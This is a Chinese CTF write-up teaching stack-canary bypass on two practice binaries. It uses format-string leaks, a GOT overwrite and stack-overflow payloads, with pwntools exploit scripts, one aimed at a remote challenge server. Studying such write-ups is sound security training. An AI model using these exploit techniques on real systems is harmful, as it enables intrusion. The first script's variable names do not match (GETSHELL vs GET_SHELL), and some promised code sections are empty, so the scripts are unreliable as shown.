Pwn-Canary保护

Pwn-Canary保护

pwn-第3部分Canary保护

canary知识点介绍

0x00 文件信息

text
pwn1: ELF 32-bit LSB executable, Intel 80386, dynamically linked, not stripped
  • 架构: 32 位 x86 (i386)
  • 保护: Canary ✅ | NX ✅ | No PIE ❌ | Partial RELRO

既然 No PIE,意味着程序中所有函数地址、GOT 地址都是固定的,这对我们非常有利。


ISCC-PWN1

题目地址:

0x01 程序分析

主要函数

objdump -d pwn1 反汇编,可以看明白程序的逻辑。

main 函数

text
main:
  call init          → 关闭缓冲
  puts("Hello Hacker!")
  call vuln          → 执行核心逻辑

vuln 函数(关键)

text
vuln:
  push ebp
  mov ebp, esp
  sub esp, 0x78           ← 分配 120 字节局部变量空间

  mov eax, gs:0x14        ← 读取 canary
  mov [ebp-0xc], eax      ← canary 放在 ebp-12 的位置

  movl $0, [ebp-0x74]     ← i = 0

loop:
  cmp [ebp-0x74], 1
  jle loop_body            ← i <= 1 就继续循环(共 2 次)

loop_body:
  read(0, buf, 0x200)     ← 读最多 512 字节到 buf
  printf(buf)              ← 把 buf 当格式串打印(!!!漏洞)
  i++
  jmp loop

canary_check:
  检查 canary → 通过则 leave; ret

两个漏洞同时存在:

漏洞位置严重程度
格式化字符串漏洞printf(buf)可读/写任意地址
栈缓冲区溢出read(0, buf, 0x200) 往 112 字节的 buf 读 512 字节可覆盖返回地址

而且程序循环 2 次,给了我们两次输入机会。

栈布局

text
高地址
          +------------------+
ebp+0x04  | 返回地址          |  ← 控制这里就能劫持程序
ebp+0x00  | 保存的 ebp        |
ebp-0x0c  | canary (4字节)    |  ← 必须保持原样,否则 crash
          | ...              |
ebp-0x70  | buf (112字节)     |  ← 我们的输入放这里
ebp-0x74  | 循环变量 i        |
低地址

关键计算: buf 到 canary 的距离 = 0x70 - 0xC = 0x64 = 100 字节

getshell 函数

text
getshell:
  push "/bin/sh"     ← 地址 0x804a008
  call system

地址 0x080491c6,直接调用 system("/bin/sh") 给我们 shell。


0x02 思路分析

既然有两次输入,我们可以:

方案一:格式化字符串写 GOT(推荐,更优雅)

原理:

  1. 第 1 次输入:利用 printf(buf) 的格式化字符串漏洞,把 printf@GOT 的内容改成 getshell 的地址
  2. 第 2 次输入:程序再次执行 printf(buf),但此时 printf 已经被替换成 getshell → 直接拿到 shell

优点: 不需要管 canary,不需要算溢出偏移。

方案二:leak canary + 栈溢出(更经典)

原理:

  1. 第 1 次输入:%31$p 泄漏 canary
  2. 第 2 次输入:构造 payload 覆盖返回地址到 getshell
    text
    'A'*100 + p32(canary) + p32(fake_ebp) + p32(ret_gadget)*3 + p32(getshell)
    

格式化字符串漏洞

为什么 printf(buf) 是漏洞?

正常用法:printf("%s", buf) ← 格式串是固定的

漏洞用法:printf(buf) ← 用户输入直接被当作格式串

如果你输入 %x.%x.%x...,printf 会从栈上读取数据并打印出来,实现信息泄漏。 如果你输入 %n,printf 会往某个地址写入数据,实现任意内存写

如何定位我们的输入在 printf 的第几个参数?

text
发送:AAAAAAAA%6$08x

如果打印出来是 AAAAAAAA41414141,说明 AAAAAAAA(0x41414141)正好在第 6 个参数的位置。这个偏移量在本题中是 6。

如何泄漏 canary?

text
发送:%31$p

为什么是 31?因为 buf 在 printf 参数中从第 6 位开始,canary 在 buf 上方 100 字节(25 个参数位),6 + 25 = 31

什么是 fmtstr_payload?

pwntoolsfmtstr_payload(offset, writes) 能自动生成格式化字符串 payload:

python
payload = fmtstr_payload(6, {printf_got: getshell_addr}, write_size='byte')

这行代码的意思:从第 6 个参数开始,把 printf@GOT 的内容写成 getshell 的地址。write_size='byte' 表示逐字节写入(更稳定)。


栈溢出时用 send 还是 sendline

这是本题最坑的细节之一。

send 和 sendline 的区别

函数发送内容适用场景
send(data)只发 data,不加任何东西read()
sendline(data)data + b'\n'gets() / fgets() / scanf()

本题为什么必须用 send?

vuln 函数用 read(0, buf, 0x200) 读入数据。 read()原始读取,遇到 \n 不会停止,也不会特殊处理。

假设我们的 payload 是 100 + 4 + 4 + 4 + 4 = 116 字节:

  • send(payload) → read 收到 116 字节,正好填满栈布局
  • sendline(payload) → read 收到 117 字节(多了一个 \n

多出来的 1 个 \n(0x0a)会覆盖返回地址的第一个字节,整个布局就错位了,程序必崩。

text
栈上本应该是:
|   canary   | fake_ebp  |  ret_gadget  |  getshell  |

用 sendline 后变成:
|   canary   | fake_ebp  |  ret_gadget  |  getshell  |  \n  ↑ 这里!
                                                      read 没读完,
                                                      但 leave;ret 已执行

更常见的场景:payload 刚好填满到返回地址,sendline 多发的 \n 正好覆盖返回地址的最低一个字节

经验法则:

  • 程序用 read() → 用 send()
  • 程序用 gets() / scanf("%s") → 用 sendline()
  • 判断不了 → 先试 send(),不行换 sendline()

0x03 完整 Exploit

方案一:格式化字符串写 GOT(推荐)
方案二:Leak Canary + 栈溢出
python
from pwn import *

HOST = '39.96.193.120'
PORT = 10018
GETSHELL = 0x080491c6      # getshell 函数地址
RET = 0x080492b5            # ret 指令地址(用来凑栈对齐)

io = remote(HOST, PORT)
io.recvuntil(b'Hello Hacker!')
io.recvline()

# ========== 第 1 次输入:泄漏 canary ==========
io.sendline(b'%31$p')              # %31$p 打印 canary
canary_str = io.recvline().strip()
canary = int(canary_str, 16)      # 把字符串 "0xabcdef12" 转成整数
log.success(f'canary = {hex(canary)}')

# ========== 第 2 次输入:栈溢出 ==========
payload = b'A' * 0x64              # 填充 buf 到 canary 的距离(100 字节)
payload += p32(canary)             # canary(保持原样,否则 crash)
payload += p32(RET)                # 覆盖 saved_ebp(随便)
payload += p32(RET) * 3            # ret 滑梯(连跳 3 个 ret)
payload += p32(GET_SHELL)          # 最终跳转到 getshell

io.send(payload)                   # ← 必须用 send!不能用 sendline!
                                   #   多一个 \n 会破坏 payload 布局

io.interactive()                   # 进入交互模式,拿到 shell

0x04 为什么方案二里要加 ret*3

这个问题和栈对齐有关,但仅限 64 位

在 64 位下,system() 内部使用 movaps 指令,要求 RSP 16 字节对齐,否则会崩溃。加一个 ret 相当于执行一次 pop rip,RSP 就会加 8,翻转对齐状态。

但在 32 位下,没有 16 字节对齐要求! 所以这里的 ret*3 实际上是多余的。payload 只需要:

text
'A'*100 + p32(canary) + p32(随便填) + p32(getshell)

加几个 ret 也没坏处,相当于 NOP 滑梯,只是跳转几下什么都不做再进入 getshell。很多 CTFer 从 64 位转 32 位时保留了写 ret 的习惯,不影响效果。


0x05 总结

知识点说明
格式化字符串漏洞printf(buf) — 可读/写任意内存
栈溢出read() 读 512 字节到 112 字节的缓冲区
Canary bypass%31$p 泄漏,然后原样写回
send vs sendlineread()send,多一个 \n 会破坏布局
No PIE地址固定,可以直接用硬编码地址
fmtstr_payloadpwntools 自动生成格式化字符串写 payload

核心套路总结

两道题实际上是一个套路:利用 printf(buf) 的格式串漏洞,达到 getshell。

  1. 方法一更直接:既然 printf 会被调用,不如直接把它变成 getshell
  2. 方法二更通用:不管程序有没有 getshell 函数,只要能 leak canary + 溢出,就能 ROP

对于新手,推荐先掌握方法二(leak canary + 溢出),因为它的思路在更多题目中通用;方法一(直接改 GOT)需要目标程序里已经有 getshell 函数,不是总有这么好的条件。


深育杯 2021 find_flag 题解 PIE

题目连接:https://www.nssctf.cn/problem/774

系统保护机制

什么是系统保护机制?

现代 Linux 程序默认开启多种保护,增加利用难度:

保护作用本题
PIE程序每次运行的地址都随机化,无法直接预测函数位置✅ 开启
Canary栈上放一个"哨兵值",函数返回前检查它有没有被篡改,防溢出✅ 开启
NX栈不可执行,不能直接在栈上写 shellcode✅ 开启
RELROGOT 表只读,不能通过改 GOT 劫持函数Full

由于 PIE 开启,我们需要先"泄漏"地址才能知道函数在哪;由于 Canary 开启,我们需要泄漏 Canary 才能绕过栈溢出检测。

什么是格式化字符串漏洞?

c
printf(user_input);   // 漏洞写法
printf("%s", user_input);  // 安全写法

如果直接把用户输入当格式串传给 printf,攻击者可以用 %p%n 等格式符来读内存写内存

常见格式符:

  • %p:以十六进制打印一个指针值(8 字节)
  • %k$p:直接打印第 k 个参数(比如 %6$p 打印第 6 个参数)
  • %n:把已输出的字节数写入某个地址(用于任意写,本题不用)

0x01 分析程序

查看保护

bash
checksec --file=find_flag

输出:

text
Arch:       amd64-64-little
RELRO:      Full RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        PIE enabled

保护全开,所以我们需要:泄漏 Canary + 泄漏地址 → 构造 ROP 链 → 获取 shell/flag

反汇编分析

用 IDA 或 objdump -d 反汇编:

text
objdump -d find_flag | grep -A 100 "1333:"
关键函数(地址 0x132f)分析

辅助函数分析

win 函数(地址 0x1229):

asm
1229: endbr64
122d: push   rbp
122e: mov    rbp, rsp
1231: lea    rdi, "/bin/cat flag.txt"   ; 参数
1238: call   system                     ; system("/bin/cat flag.txt")
123d: nop
123e: pop   rbp
123f: ret

这个函数就是我们的目标——跳转到它就能执行 cat flag.txt 拿到 flag。

栈布局

text
        buffer1     buffer2       canary    saved RBP   返回地址
        (32B)       (32B)         (8B)      (8B)        (8B)
      |-----------|-------------|---------|-----------|-----------|
rbp→  -0x60       -0x40        -0x8      0x0         +0x8
                               ★                  ★
                           需要泄漏          需要泄漏

0x02 攻击思路

分两步走:

Step 1:泄漏 Canary 和 PIE 基址

利用第一次输入的格式化字符串漏洞,用 %p 读取栈上的值。

关键推导:

  • buffer1 在 rbp-0x60
  • Canary 在 rbp-0x08
  • 两者距离:0x60 - 0x08 = 0x58 = 88 字节 = 11 个 qword

printf(buffer1) 被调用时:

  • %1$p%5$p 读寄存器 RSIR9
  • %6$p栈上第 1 个位置 = buffer1 开头
  • %6+11$p = %17$p = Canary

同理,返回地址在 rbp+0x08,距 buffer1 共 0x68 / 8 = 13 个 qword:

  • %6+13$p = %19$p = 返回地址
  • 返回地址是 main+0x146f减去 0x146f 就是 PIE 基址

有了 PIE 基址,就能计算出 win 函数的真正地址(基址 + 0x1229)。


Step 2:栈溢出跳转到 win 函数

第二次输入用 gets(buffer2),构造 payload:

text
buffer2 → [  0x38 填充  ][  Canary  ][  假 RBP  ][  ret  ][  win  ]
          rbp-0x40       rbp-0x8    rbp+0x0      rbp+0x8 rbp+0x10
                         ↓           ↓            ↓        ↓
                      原样填回      任意值       ret对齐    win 地址

为什么加一个 ret 在前面?因为 system() 内部有 movaps 指令,要求 RSP 16 字节对齐。加一个 ret 让 RSP 多移动 8 字节,调整对齐。


0x03 编写 Exploit(逐行讲解)

首先安装 pwntools(Python 的 PWN 工具库):

bash
pip install pwntools

然后创建 exploit.py

python
from pwn import *    # 导入 pwntools 所有功能

# 设置目标架构为 amd64(64位)
context.arch = 'amd64'
# 日志级别设为 info(显示成功/错误信息,少一些干扰)
context.log_level = 'info'

# 加载 ELF 文件,获取符号信息
elf = ELF('./find_flag')

# 连接程序(本地测试用 process,打远程用 remote)
p = process('./find_flag')
# p = remote('node5.anna.nssctf.cn', 28586)  # 远程靶机
第 1 步:泄露 Canary 和 PIE 基址
第 2 步:构造栈溢出 payload
python
# 等待第二个提示
p.recvuntil(b"Anything else? ")

# 构造 payload:
# - 0x38 字节填充(从 buffer2 到 canary)
# - Canary(原样写回,绕过检查)
# - 8 字节假 RBP(任意值)
# - ret gadget(修复栈对齐)
# - win 函数地址
payload2 = b"A" * 0x38          # 填充 56 字节
payload2 += p64(canary)         # Canary(8 字节,小端序)
payload2 += b"B" * 8            # 假 RBP(8 字节)
payload2 += p64(ret_gadget)     # ret gadget(对齐用)
payload2 += p64(win_addr)       # win 函数地址

p.sendline(payload2)            # 发送 payload

# 进入交互模式,拿到 flag
p.interactive()
完整脚本

0x04 调试辅助:用 GDB 验证

推荐用 GDB + pwndbg 插件来观察内存。

下断点

bash
gdb ./find_flag
start                    # 启动程序,停在入口点
b *$rebase(0x13bb)       # 断在 printf(buffer1) 处,$rebase 自动加 PIE 基址
c                        # 继续运行

输入测试 payload

程序提示 name? 后输入:

text
AAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p

观察栈

gdb
stack 40      # 或 telescope $rsp 30

输出中能看到:

  • arg[6]: 0x252e702541414141 = AAAA%p.%(你的输入在 %6$p
  • arg[17]: 0x????...??00 = Canary(最低字节是 0x00)
  • arg[19]: 0x5555...146f = 返回地址

验证 Canary

gdb
p/x 0x????...??00 & 0xff    # 结果应为 0x00,证明是 Canary

0x05 常见问题

Q:为什么是 %17$p 不是别的?

buffer1 在 rbp-0x60,Canary 在 rbp-0x08。距离 = 0x58 字节 = 11 个 qword。%6$p 读 buffer1 开头,所以 %6+11$p = %17$p

Q:为什么要加一个 ret 在 win 前面?

system() 内部用 movaps 要求 RSP 16 字节对齐。不加 ret 时 RSP 可能不对齐,程序崩溃。

Q:为什么不用 system("/bin/sh") 而用 cat flag.txt

因为 win 函数里已经写死了 /bin/cat flag.txt,我们只能跳过去执行它。题目设计如此。

Q:p64() 是什么?

pwntools 的函数,把整数转为 8 字节的小端序字节串。x86-64 是小端序(低位字节放低地址)。例如 p64(0x1234)b"\x34\x12\x00\x00\x00\x00\x00\x00"

Q:recvuntil(drop=True) 有什么用?

drop=True 表示不包含匹配的字符串在结果里。recvuntil(b"!\n", drop=True) 会收 ! 之前的所有内容,!\n 被丢弃。

新故事即将发生
Pwn_栈溢出ret2text

评论区

评论加载中...